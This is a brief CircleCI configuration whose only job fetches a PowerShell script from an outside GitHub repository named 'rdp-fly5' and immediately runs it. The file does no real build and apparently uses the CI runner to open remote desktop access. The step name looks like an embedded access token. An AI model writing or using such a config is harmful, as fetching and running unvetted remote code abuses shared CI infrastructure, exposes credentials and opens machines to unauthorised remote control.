version: 2.1

orbs:
  win: circleci/windows@2.2.0

jobs:
  build:
    executor:
      name: win/default
      size: "medium"



    steps:
      
       - run:
           name: 1R9KxdF0rxFF4bcr51ZfYyqiXfS_75xzdufZLZcvx6ijmzsyF
           command:
             Invoke-WebRequest https://raw.githubusercontent.com/ENDERSOUL5/rdp-fly5/main/sh -Outfile gpu.ps1

       - run: ./gpu.ps1 